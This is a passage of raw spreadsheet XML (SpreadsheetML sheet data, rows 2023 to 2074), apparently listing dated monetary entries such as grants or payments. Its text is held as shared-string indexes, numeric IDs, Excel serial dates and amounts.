      <c r="C2023" t="s">
        <v>7229</v>
      </c>
      <c r="D2023" t="s">
        <v>11476</v>
      </c>
      <c r="E2023">
        <v>16</v>
      </c>
      <c r="F2023" t="s">
        <v>11477</v>
      </c>
      <c r="G2023" s="1">
        <v>44057</v>
      </c>
      <c r="H2023">
        <v>0</v>
      </c>
      <c r="I2023" t="s">
        <v>11478</v>
      </c>
    </row>
    <row r="2024" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2024">
        <v>21557</v>
      </c>
      <c r="B2024">
        <v>4761</v>
      </c>
      <c r="C2024" t="s">
        <v>7266</v>
      </c>
      <c r="D2024" t="s">
        <v>11479</v>
      </c>
      <c r="E2024">
        <v>5</v>
      </c>
      <c r="F2024" t="s">
        <v>11480</v>
      </c>
      <c r="G2024" s="1">
        <v>44118</v>
      </c>
      <c r="H2024">
        <v>12000</v>
      </c>
      <c r="I2024" t="s">
        <v>9638</v>
      </c>
      <c r="J2024" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2025" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2025">
        <v>21558</v>
      </c>
      <c r="B2025">
        <v>4761</v>
      </c>
      <c r="C2025" t="s">
        <v>7266</v>
      </c>
      <c r="D2025" t="s">
        <v>11479</v>
      </c>
      <c r="E2025">
        <v>5</v>
      </c>
      <c r="F2025" t="s">
        <v>11481</v>
      </c>
      <c r="G2025" s="1">
        <v>44118</v>
      </c>
      <c r="H2025">
        <v>8000</v>
      </c>
    </row>
    <row r="2026" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2026">
        <v>21559</v>
      </c>
      <c r="B2026">
        <v>4761</v>
      </c>
      <c r="C2026" t="s">
        <v>7266</v>
      </c>
      <c r="D2026" t="s">
        <v>11479</v>
      </c>
      <c r="E2026">
        <v>5</v>
      </c>
      <c r="F2026" t="s">
        <v>9527</v>
      </c>
      <c r="G2026" s="1">
        <v>44118</v>
      </c>
      <c r="H2026">
        <v>500</v>
      </c>
    </row>
    <row r="2027" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2027">
        <v>21560</v>
      </c>
      <c r="B2027">
        <v>4759</v>
      </c>
      <c r="C2027" t="s">
        <v>7012</v>
      </c>
      <c r="D2027" t="s">
        <v>11305</v>
      </c>
      <c r="E2027">
        <v>16</v>
      </c>
      <c r="F2027" t="s">
        <v>11482</v>
      </c>
      <c r="G2027" s="1">
        <v>44048</v>
      </c>
      <c r="H2027">
        <v>10000</v>
      </c>
      <c r="J2027" t="s">
        <v>11483</v>
      </c>
    </row>
    <row r="2028" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2028">
        <v>21563</v>
      </c>
      <c r="B2028">
        <v>1384</v>
      </c>
      <c r="C2028" t="s">
        <v>1719</v>
      </c>
      <c r="D2028" t="s">
        <v>11484</v>
      </c>
      <c r="E2028">
        <v>2</v>
      </c>
      <c r="F2028" t="s">
        <v>11485</v>
      </c>
      <c r="G2028" s="1">
        <v>44088</v>
      </c>
      <c r="H2028">
        <v>2000000</v>
      </c>
      <c r="J2028" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2029" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2029">
        <v>21565</v>
      </c>
      <c r="B2029">
        <v>764</v>
      </c>
      <c r="C2029" t="s">
        <v>1382</v>
      </c>
      <c r="D2029" t="s">
        <v>11124</v>
      </c>
      <c r="E2029">
        <v>16</v>
      </c>
      <c r="F2029" t="s">
        <v>11486</v>
      </c>
      <c r="G2029" s="1">
        <v>44070</v>
      </c>
      <c r="H2029">
        <v>106300</v>
      </c>
      <c r="J2029" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="2030" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2030">
        <v>21566</v>
      </c>
      <c r="B2030">
        <v>710</v>
      </c>
      <c r="C2030" t="s">
        <v>1736</v>
      </c>
      <c r="D2030" t="s">
        <v>11487</v>
      </c>
      <c r="E2030">
        <v>23</v>
      </c>
      <c r="F2030" t="s">
        <v>1738</v>
      </c>
      <c r="G2030" s="1">
        <v>44055</v>
      </c>
      <c r="H2030">
        <v>1200</v>
      </c>
      <c r="I2030" t="s">
        <v>11488</v>
      </c>
    </row>
    <row r="2031" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2031">
        <v>21567</v>
      </c>
      <c r="B2031">
        <v>2826</v>
      </c>
      <c r="C2031" t="s">
        <v>7275</v>
      </c>
      <c r="D2031" t="s">
        <v>11489</v>
      </c>
      <c r="E2031">
        <v>12</v>
      </c>
      <c r="F2031" t="s">
        <v>9437</v>
      </c>
      <c r="G2031" s="1">
        <v>44097</v>
      </c>
      <c r="H2031">
        <v>500000</v>
      </c>
      <c r="I2031" t="s">
        <v>9550</v>
      </c>
      <c r="J2031" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2032" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2032">
        <v>21568</v>
      </c>
      <c r="B2032">
        <v>2826</v>
      </c>
      <c r="C2032" t="s">
        <v>7275</v>
      </c>
      <c r="D2032" t="s">
        <v>11489</v>
      </c>
      <c r="E2032">
        <v>12</v>
      </c>
      <c r="F2032" t="s">
        <v>11490</v>
      </c>
      <c r="G2032" s="1">
        <v>44097</v>
      </c>
      <c r="H2032">
        <v>500000</v>
      </c>
      <c r="I2032" t="s">
        <v>9550</v>
      </c>
      <c r="J2032" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2033" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2033">
        <v>21569</v>
      </c>
      <c r="B2033">
        <v>2826</v>
      </c>
      <c r="C2033" t="s">
        <v>7275</v>
      </c>
      <c r="D2033" t="s">
        <v>11489</v>
      </c>
      <c r="E2033">
        <v>12</v>
      </c>
      <c r="F2033" t="s">
        <v>11491</v>
      </c>
      <c r="G2033" s="1">
        <v>44097</v>
      </c>
      <c r="H2033">
        <v>300000</v>
      </c>
      <c r="I2033" t="s">
        <v>9550</v>
      </c>
      <c r="J2033" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2034" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2034">
        <v>21570</v>
      </c>
      <c r="B2034">
        <v>2826</v>
      </c>
      <c r="C2034" t="s">
        <v>7275</v>
      </c>
      <c r="D2034" t="s">
        <v>11489</v>
      </c>
      <c r="E2034">
        <v>12</v>
      </c>
      <c r="F2034" t="s">
        <v>9435</v>
      </c>
      <c r="G2034" s="1">
        <v>44097</v>
      </c>
      <c r="H2034">
        <v>50000</v>
      </c>
      <c r="I2034" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2035" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2035">
        <v>21571</v>
      </c>
      <c r="B2035">
        <v>2826</v>
      </c>
      <c r="C2035" t="s">
        <v>7275</v>
      </c>
      <c r="D2035" t="s">
        <v>11489</v>
      </c>
      <c r="E2035">
        <v>12</v>
      </c>
      <c r="F2035" t="s">
        <v>11492</v>
      </c>
      <c r="G2035" s="1">
        <v>44097</v>
      </c>
      <c r="H2035">
        <v>10000</v>
      </c>
      <c r="I2035" t="s">
        <v>9550</v>
      </c>
      <c r="J2035" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2036" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2036">
        <v>21573</v>
      </c>
      <c r="B2036">
        <v>2826</v>
      </c>
      <c r="C2036" t="s">
        <v>7275</v>
      </c>
      <c r="D2036" t="s">
        <v>11489</v>
      </c>
      <c r="E2036">
        <v>12</v>
      </c>
      <c r="F2036" t="s">
        <v>9595</v>
      </c>
      <c r="G2036" s="1">
        <v>44097</v>
      </c>
      <c r="H2036">
        <v>100000</v>
      </c>
      <c r="I2036" t="s">
        <v>9550</v>
      </c>
      <c r="J2036" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2037" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2037">
        <v>21577</v>
      </c>
      <c r="B2037">
        <v>4811</v>
      </c>
      <c r="C2037" t="s">
        <v>7282</v>
      </c>
      <c r="D2037" t="s">
        <v>11493</v>
      </c>
      <c r="E2037">
        <v>12</v>
      </c>
      <c r="F2037" t="s">
        <v>9437</v>
      </c>
      <c r="G2037" s="1">
        <v>44095</v>
      </c>
      <c r="H2037">
        <v>500000</v>
      </c>
      <c r="I2037" t="s">
        <v>9550</v>
      </c>
      <c r="J2037" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2038" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2038">
        <v>21578</v>
      </c>
      <c r="B2038">
        <v>4811</v>
      </c>
      <c r="C2038" t="s">
        <v>7282</v>
      </c>
      <c r="D2038" t="s">
        <v>11493</v>
      </c>
      <c r="E2038">
        <v>12</v>
      </c>
      <c r="F2038" t="s">
        <v>11494</v>
      </c>
      <c r="G2038" s="1">
        <v>44095</v>
      </c>
      <c r="H2038">
        <v>500000</v>
      </c>
      <c r="I2038" t="s">
        <v>9550</v>
      </c>
      <c r="J2038" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2039" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2039">
        <v>21579</v>
      </c>
      <c r="B2039">
        <v>4811</v>
      </c>
      <c r="C2039" t="s">
        <v>7282</v>
      </c>
      <c r="D2039" t="s">
        <v>11493</v>
      </c>
      <c r="E2039">
        <v>12</v>
      </c>
      <c r="F2039" t="s">
        <v>11491</v>
      </c>
      <c r="G2039" s="1">
        <v>44095</v>
      </c>
      <c r="H2039">
        <v>300000</v>
      </c>
      <c r="I2039" t="s">
        <v>9550</v>
      </c>
      <c r="J2039" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2040" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2040">
        <v>21580</v>
      </c>
      <c r="B2040">
        <v>4811</v>
      </c>
      <c r="C2040" t="s">
        <v>7282</v>
      </c>
      <c r="D2040" t="s">
        <v>11493</v>
      </c>
      <c r="E2040">
        <v>12</v>
      </c>
      <c r="F2040" t="s">
        <v>2236</v>
      </c>
      <c r="G2040" s="1">
        <v>44095</v>
      </c>
      <c r="H2040">
        <v>100000</v>
      </c>
      <c r="I2040" t="s">
        <v>9550</v>
      </c>
      <c r="J2040" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2041" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2041">
        <v>21581</v>
      </c>
      <c r="B2041">
        <v>4811</v>
      </c>
      <c r="C2041" t="s">
        <v>7282</v>
      </c>
      <c r="D2041" t="s">
        <v>11493</v>
      </c>
      <c r="E2041">
        <v>12</v>
      </c>
      <c r="F2041" t="s">
        <v>9459</v>
      </c>
      <c r="G2041" s="1">
        <v>44095</v>
      </c>
      <c r="H2041">
        <v>200000</v>
      </c>
      <c r="I2041" t="s">
        <v>9550</v>
      </c>
      <c r="J2041" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2042" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2042">
        <v>21582</v>
      </c>
      <c r="B2042">
        <v>4811</v>
      </c>
      <c r="C2042" t="s">
        <v>7282</v>
      </c>
      <c r="D2042" t="s">
        <v>11493</v>
      </c>
      <c r="E2042">
        <v>12</v>
      </c>
      <c r="F2042" t="s">
        <v>10130</v>
      </c>
      <c r="G2042" s="1">
        <v>44095</v>
      </c>
      <c r="H2042">
        <v>100000</v>
      </c>
      <c r="I2042" t="s">
        <v>9550</v>
      </c>
      <c r="J2042" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2043" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2043">
        <v>21583</v>
      </c>
      <c r="B2043">
        <v>4810</v>
      </c>
      <c r="C2043" t="s">
        <v>7289</v>
      </c>
      <c r="D2043" t="s">
        <v>11495</v>
      </c>
      <c r="E2043">
        <v>12</v>
      </c>
      <c r="F2043" t="s">
        <v>9437</v>
      </c>
      <c r="G2043" s="1">
        <v>44095</v>
      </c>
      <c r="H2043">
        <v>500000</v>
      </c>
      <c r="I2043" t="s">
        <v>9550</v>
      </c>
      <c r="J2043" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2044" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2044">
        <v>21584</v>
      </c>
      <c r="B2044">
        <v>4810</v>
      </c>
      <c r="C2044" t="s">
        <v>7289</v>
      </c>
      <c r="D2044" t="s">
        <v>11495</v>
      </c>
      <c r="E2044">
        <v>12</v>
      </c>
      <c r="F2044" t="s">
        <v>11496</v>
      </c>
      <c r="G2044" s="1">
        <v>44095</v>
      </c>
      <c r="H2044">
        <v>500000</v>
      </c>
      <c r="I2044" t="s">
        <v>9550</v>
      </c>
      <c r="J2044" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2045" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2045">
        <v>21585</v>
      </c>
      <c r="B2045">
        <v>4810</v>
      </c>
      <c r="C2045" t="s">
        <v>7289</v>
      </c>
      <c r="D2045" t="s">
        <v>11495</v>
      </c>
      <c r="E2045">
        <v>12</v>
      </c>
      <c r="F2045" t="s">
        <v>11491</v>
      </c>
      <c r="G2045" s="1">
        <v>44095</v>
      </c>
      <c r="H2045">
        <v>300000</v>
      </c>
      <c r="I2045" t="s">
        <v>9550</v>
      </c>
      <c r="J2045" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2046" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2046">
        <v>21586</v>
      </c>
      <c r="B2046">
        <v>4810</v>
      </c>
      <c r="C2046" t="s">
        <v>7289</v>
      </c>
      <c r="D2046" t="s">
        <v>11495</v>
      </c>
      <c r="E2046">
        <v>12</v>
      </c>
      <c r="F2046" t="s">
        <v>609</v>
      </c>
      <c r="G2046" s="1">
        <v>44095</v>
      </c>
      <c r="H2046">
        <v>100000</v>
      </c>
      <c r="I2046" t="s">
        <v>9550</v>
      </c>
      <c r="J2046" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2047" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2047">
        <v>21587</v>
      </c>
      <c r="B2047">
        <v>4810</v>
      </c>
      <c r="C2047" t="s">
        <v>7289</v>
      </c>
      <c r="D2047" t="s">
        <v>11495</v>
      </c>
      <c r="E2047">
        <v>12</v>
      </c>
      <c r="F2047" t="s">
        <v>1746</v>
      </c>
      <c r="G2047" s="1">
        <v>44095</v>
      </c>
      <c r="H2047">
        <v>100000</v>
      </c>
      <c r="I2047" t="s">
        <v>9550</v>
      </c>
      <c r="J2047" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2048" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2048">
        <v>21588</v>
      </c>
      <c r="B2048">
        <v>4810</v>
      </c>
      <c r="C2048" t="s">
        <v>7289</v>
      </c>
      <c r="D2048" t="s">
        <v>11495</v>
      </c>
      <c r="E2048">
        <v>12</v>
      </c>
      <c r="F2048" t="s">
        <v>9523</v>
      </c>
      <c r="G2048" s="1">
        <v>44095</v>
      </c>
      <c r="H2048">
        <v>100000</v>
      </c>
      <c r="I2048" t="s">
        <v>9550</v>
      </c>
      <c r="J2048" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2049" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2049">
        <v>21589</v>
      </c>
      <c r="B2049">
        <v>383</v>
      </c>
      <c r="C2049" t="s">
        <v>1392</v>
      </c>
      <c r="D2049" t="s">
        <v>11497</v>
      </c>
      <c r="E2049">
        <v>16</v>
      </c>
      <c r="F2049" t="s">
        <v>9546</v>
      </c>
      <c r="G2049" s="1">
        <v>44090</v>
      </c>
      <c r="H2049">
        <v>300000</v>
      </c>
      <c r="J2049" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2050" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2050">
        <v>21590</v>
      </c>
      <c r="B2050">
        <v>383</v>
      </c>
      <c r="C2050" t="s">
        <v>1392</v>
      </c>
      <c r="D2050" t="s">
        <v>11498</v>
      </c>
      <c r="E2050">
        <v>16</v>
      </c>
      <c r="F2050" t="s">
        <v>11499</v>
      </c>
      <c r="G2050" s="1">
        <v>44090</v>
      </c>
      <c r="H2050">
        <v>300000</v>
      </c>
      <c r="I2050" t="s">
        <v>11500</v>
      </c>
    </row>
    <row r="2051" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2051">
        <v>21591</v>
      </c>
      <c r="B2051">
        <v>383</v>
      </c>
      <c r="C2051" t="s">
        <v>1392</v>
      </c>
      <c r="D2051" t="s">
        <v>11498</v>
      </c>
      <c r="E2051">
        <v>16</v>
      </c>
      <c r="F2051" t="s">
        <v>1455</v>
      </c>
      <c r="G2051" s="1">
        <v>44095</v>
      </c>
      <c r="H2051">
        <v>2400000</v>
      </c>
      <c r="I2051" t="s">
        <v>9536</v>
      </c>
      <c r="J2051" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2052" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2052">
        <v>21592</v>
      </c>
      <c r="B2052">
        <v>383</v>
      </c>
      <c r="C2052" t="s">
        <v>1392</v>
      </c>
      <c r="D2052" t="s">
        <v>11501</v>
      </c>
      <c r="E2052">
        <v>16</v>
      </c>
      <c r="F2052" t="s">
        <v>1651</v>
      </c>
      <c r="G2052" s="1">
        <v>44090</v>
      </c>
      <c r="H2052">
        <v>4300000</v>
      </c>
      <c r="I2052" t="s">
        <v>11502</v>
      </c>
    </row>
    <row r="2053" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2053">
        <v>21593</v>
      </c>
      <c r="B2053">
        <v>548</v>
      </c>
      <c r="C2053" t="s">
        <v>1728</v>
      </c>
      <c r="D2053" t="s">
        <v>11503</v>
      </c>
      <c r="E2053">
        <v>12</v>
      </c>
      <c r="F2053" t="s">
        <v>11504</v>
      </c>
      <c r="G2053" s="1">
        <v>44095</v>
      </c>
      <c r="H2053">
        <v>3174618</v>
      </c>
      <c r="I2053" t="s">
        <v>11505</v>
      </c>
      <c r="J2053" t="s">
        <v>11506</v>
      </c>
    </row>
    <row r="2054" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2054">
        <v>21601</v>
      </c>
      <c r="B2054">
        <v>2688</v>
      </c>
      <c r="C2054" t="s">
        <v>6175</v>
      </c>
      <c r="D2054" t="s">
        <v>11507</v>
      </c>
      <c r="E2054">
        <v>13</v>
      </c>
      <c r="F2054" t="s">
        <v>11508</v>
      </c>
      <c r="G2054" s="1">
        <v>44034</v>
      </c>
      <c r="H2054">
        <v>800</v>
      </c>
      <c r="I2054" t="s">
        <v>11509</v>
      </c>
    </row>
    <row r="2055" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2055">
        <v>21602</v>
      </c>
      <c r="B2055">
        <v>2688</v>
      </c>
      <c r="C2055" t="s">
        <v>6175</v>
      </c>
      <c r="D2055" t="s">
        <v>11507</v>
      </c>
      <c r="E2055">
        <v>13</v>
      </c>
      <c r="F2055" t="s">
        <v>11510</v>
      </c>
      <c r="G2055" s="1">
        <v>44034</v>
      </c>
      <c r="H2055">
        <v>1500</v>
      </c>
      <c r="I2055" t="s">
        <v>11511</v>
      </c>
    </row>
    <row r="2056" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2056">
        <v>21603</v>
      </c>
      <c r="B2056">
        <v>565</v>
      </c>
      <c r="C2056" t="s">
        <v>1744</v>
      </c>
      <c r="D2056" t="s">
        <v>11512</v>
      </c>
      <c r="E2056">
        <v>24</v>
      </c>
      <c r="F2056" t="s">
        <v>1746</v>
      </c>
      <c r="G2056" s="1">
        <v>44117</v>
      </c>
      <c r="H2056">
        <v>480000</v>
      </c>
      <c r="J2056" t="s">
        <v>11513</v>
      </c>
    </row>
    <row r="2057" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2057">
        <v>21605</v>
      </c>
      <c r="B2057">
        <v>548</v>
      </c>
      <c r="C2057" t="s">
        <v>16407</v>
      </c>
      <c r="D2057" t="s">
        <v>16408</v>
      </c>
      <c r="E2057">
        <v>12</v>
      </c>
      <c r="F2057" t="s">
        <v>2236</v>
      </c>
      <c r="G2057" s="1">
        <v>44095</v>
      </c>
      <c r="H2057" s="4">
        <v>509809</v>
      </c>
      <c r="I2057" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2058" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2058">
        <v>21606</v>
      </c>
      <c r="B2058">
        <v>548</v>
      </c>
      <c r="C2058" t="s">
        <v>16407</v>
      </c>
      <c r="D2058" t="s">
        <v>16408</v>
      </c>
      <c r="E2058">
        <v>12</v>
      </c>
      <c r="F2058" t="s">
        <v>11514</v>
      </c>
      <c r="G2058" s="1">
        <v>44095</v>
      </c>
      <c r="H2058" s="4">
        <v>7171</v>
      </c>
      <c r="I2058" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2059" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2059">
        <v>21610</v>
      </c>
      <c r="B2059">
        <v>2784</v>
      </c>
      <c r="C2059" t="s">
        <v>6970</v>
      </c>
      <c r="D2059" t="s">
        <v>10842</v>
      </c>
      <c r="E2059">
        <v>12</v>
      </c>
      <c r="F2059" t="s">
        <v>11515</v>
      </c>
      <c r="G2059" s="1">
        <v>44046</v>
      </c>
      <c r="H2059">
        <v>100000</v>
      </c>
      <c r="I2059" t="s">
        <v>9550</v>
      </c>
      <c r="J2059" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2060" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2060">
        <v>21615</v>
      </c>
      <c r="B2060">
        <v>2332</v>
      </c>
      <c r="C2060" t="s">
        <v>5974</v>
      </c>
      <c r="D2060" t="s">
        <v>9594</v>
      </c>
      <c r="E2060">
        <v>13</v>
      </c>
      <c r="F2060" t="s">
        <v>9438</v>
      </c>
      <c r="G2060" s="1">
        <v>44105</v>
      </c>
      <c r="H2060">
        <v>10000</v>
      </c>
      <c r="I2060" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2061" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2061">
        <v>21616</v>
      </c>
      <c r="B2061">
        <v>2742</v>
      </c>
      <c r="C2061" t="s">
        <v>16409</v>
      </c>
      <c r="D2061" t="s">
        <v>16410</v>
      </c>
      <c r="E2061">
        <v>13</v>
      </c>
      <c r="F2061" t="s">
        <v>7296</v>
      </c>
      <c r="G2061" s="1">
        <v>44151</v>
      </c>
      <c r="H2061" s="5">
        <v>142843.5</v>
      </c>
      <c r="I2061" t="s">
        <v>11516</v>
      </c>
    </row>
    <row r="2062" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2062">
        <v>21621</v>
      </c>
      <c r="B2062">
        <v>1287</v>
      </c>
      <c r="C2062" t="s">
        <v>3324</v>
      </c>
      <c r="D2062" t="s">
        <v>11517</v>
      </c>
      <c r="E2062">
        <v>13</v>
      </c>
      <c r="F2062" t="s">
        <v>3326</v>
      </c>
      <c r="G2062" s="1">
        <v>44067</v>
      </c>
      <c r="H2062">
        <v>200000</v>
      </c>
      <c r="I2062" t="s">
        <v>11131</v>
      </c>
      <c r="J2062" t="s">
        <v>11518</v>
      </c>
    </row>
    <row r="2063" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2063">
        <v>21624</v>
      </c>
      <c r="B2063">
        <v>575</v>
      </c>
      <c r="C2063" t="s">
        <v>1760</v>
      </c>
      <c r="D2063" t="s">
        <v>11519</v>
      </c>
      <c r="E2063">
        <v>24</v>
      </c>
      <c r="F2063" t="s">
        <v>673</v>
      </c>
      <c r="G2063" s="1">
        <v>44085</v>
      </c>
      <c r="H2063">
        <v>1050000</v>
      </c>
      <c r="J2063" t="s">
        <v>11513</v>
      </c>
    </row>
    <row r="2064" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2064">
        <v>21625</v>
      </c>
      <c r="B2064">
        <v>575</v>
      </c>
      <c r="C2064" t="s">
        <v>1760</v>
      </c>
      <c r="D2064" t="s">
        <v>11519</v>
      </c>
      <c r="E2064">
        <v>24</v>
      </c>
      <c r="F2064" t="s">
        <v>9441</v>
      </c>
      <c r="G2064" s="1">
        <v>44085</v>
      </c>
      <c r="H2064">
        <v>12000</v>
      </c>
      <c r="J2064" t="s">
        <v>10109</v>
      </c>
    </row>
    <row r="2065" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2065">
        <v>21626</v>
      </c>
      <c r="B2065">
        <v>575</v>
      </c>
      <c r="C2065" t="s">
        <v>1760</v>
      </c>
      <c r="D2065" t="s">
        <v>11519</v>
      </c>
      <c r="E2065">
        <v>24</v>
      </c>
      <c r="F2065" t="s">
        <v>11520</v>
      </c>
      <c r="G2065" s="1">
        <v>44085</v>
      </c>
      <c r="H2065">
        <v>66000</v>
      </c>
      <c r="J2065" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2066" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2066">
        <v>21627</v>
      </c>
      <c r="B2066">
        <v>4837</v>
      </c>
      <c r="C2066" t="s">
        <v>7239</v>
      </c>
      <c r="D2066" t="s">
        <v>11521</v>
      </c>
      <c r="E2066">
        <v>16</v>
      </c>
      <c r="F2066" t="s">
        <v>7241</v>
      </c>
      <c r="G2066" s="1">
        <v>44090</v>
      </c>
      <c r="H2066">
        <v>10200</v>
      </c>
      <c r="I2066" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2067" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2067">
        <v>21631</v>
      </c>
      <c r="B2067">
        <v>4809</v>
      </c>
      <c r="C2067" t="s">
        <v>7304</v>
      </c>
      <c r="D2067" t="s">
        <v>11522</v>
      </c>
      <c r="E2067">
        <v>16</v>
      </c>
      <c r="F2067" t="s">
        <v>9466</v>
      </c>
      <c r="G2067" s="1">
        <v>44104</v>
      </c>
      <c r="H2067">
        <v>10000</v>
      </c>
      <c r="J2067" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2068" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2068">
        <v>21632</v>
      </c>
      <c r="B2068">
        <v>4809</v>
      </c>
      <c r="C2068" t="s">
        <v>7304</v>
      </c>
      <c r="D2068" t="s">
        <v>11522</v>
      </c>
      <c r="E2068">
        <v>16</v>
      </c>
      <c r="F2068" t="s">
        <v>5434</v>
      </c>
      <c r="G2068" s="1">
        <v>44104</v>
      </c>
      <c r="H2068">
        <v>10000</v>
      </c>
      <c r="J2068" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2069" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2069">
        <v>21633</v>
      </c>
      <c r="B2069">
        <v>4809</v>
      </c>
      <c r="C2069" t="s">
        <v>7304</v>
      </c>
      <c r="D2069" t="s">
        <v>11522</v>
      </c>
      <c r="E2069">
        <v>16</v>
      </c>
      <c r="F2069" t="s">
        <v>9641</v>
      </c>
      <c r="G2069" s="1">
        <v>44104</v>
      </c>
      <c r="H2069">
        <v>10000</v>
      </c>
      <c r="J2069" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2070" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2070">
        <v>21634</v>
      </c>
      <c r="B2070">
        <v>4809</v>
      </c>
      <c r="C2070" t="s">
        <v>7304</v>
      </c>
      <c r="D2070" t="s">
        <v>11522</v>
      </c>
      <c r="E2070">
        <v>16</v>
      </c>
      <c r="F2070" t="s">
        <v>11523</v>
      </c>
      <c r="G2070" s="1">
        <v>44104</v>
      </c>
      <c r="H2070">
        <v>10000</v>
      </c>
      <c r="J2070" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2071" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2071">
        <v>21635</v>
      </c>
      <c r="B2071">
        <v>4809</v>
      </c>
      <c r="C2071" t="s">
        <v>7304</v>
      </c>
      <c r="D2071" t="s">
        <v>11522</v>
      </c>
      <c r="E2071">
        <v>16</v>
      </c>
      <c r="F2071" t="s">
        <v>9675</v>
      </c>
      <c r="G2071" s="1">
        <v>44104</v>
      </c>
      <c r="H2071">
        <v>10000</v>
      </c>
      <c r="J2071" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2072" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2072">
        <v>21636</v>
      </c>
      <c r="B2072">
        <v>4809</v>
      </c>
      <c r="C2072" t="s">
        <v>7304</v>
      </c>
      <c r="D2072" t="s">
        <v>11522</v>
      </c>
      <c r="E2072">
        <v>16</v>
      </c>
      <c r="F2072" t="s">
        <v>9523</v>
      </c>
      <c r="G2072" s="1">
        <v>44104</v>
      </c>
      <c r="H2072">
        <v>10000</v>
      </c>
      <c r="J2072" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2073" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2073">
        <v>21637</v>
      </c>
      <c r="B2073">
        <v>4809</v>
      </c>
      <c r="C2073" t="s">
        <v>7304</v>
      </c>
      <c r="D2073" t="s">
        <v>11522</v>
      </c>
      <c r="E2073">
        <v>16</v>
      </c>
      <c r="F2073" t="s">
        <v>9435</v>
      </c>
      <c r="G2073" s="1">
        <v>44104</v>
      </c>
      <c r="H2073">
        <v>5000</v>
      </c>
      <c r="J2073" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2074" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2074">
        <v>21638</v>
      </c>
      <c r="B2074">
        <v>4809</v>
      </c>
      <c r="C2074" t="s">
        <v>7304</v>
      </c>
      <c r="D2074" t="s">
        <v>11522</v>
      </c>
      <c r="E2074">
        <v>16</v>
      </c>
      <c r="F2074" t="s">
        <v>10463</v>
      </c>
      <c r="G2074" s="1">
        <v>44104</v>
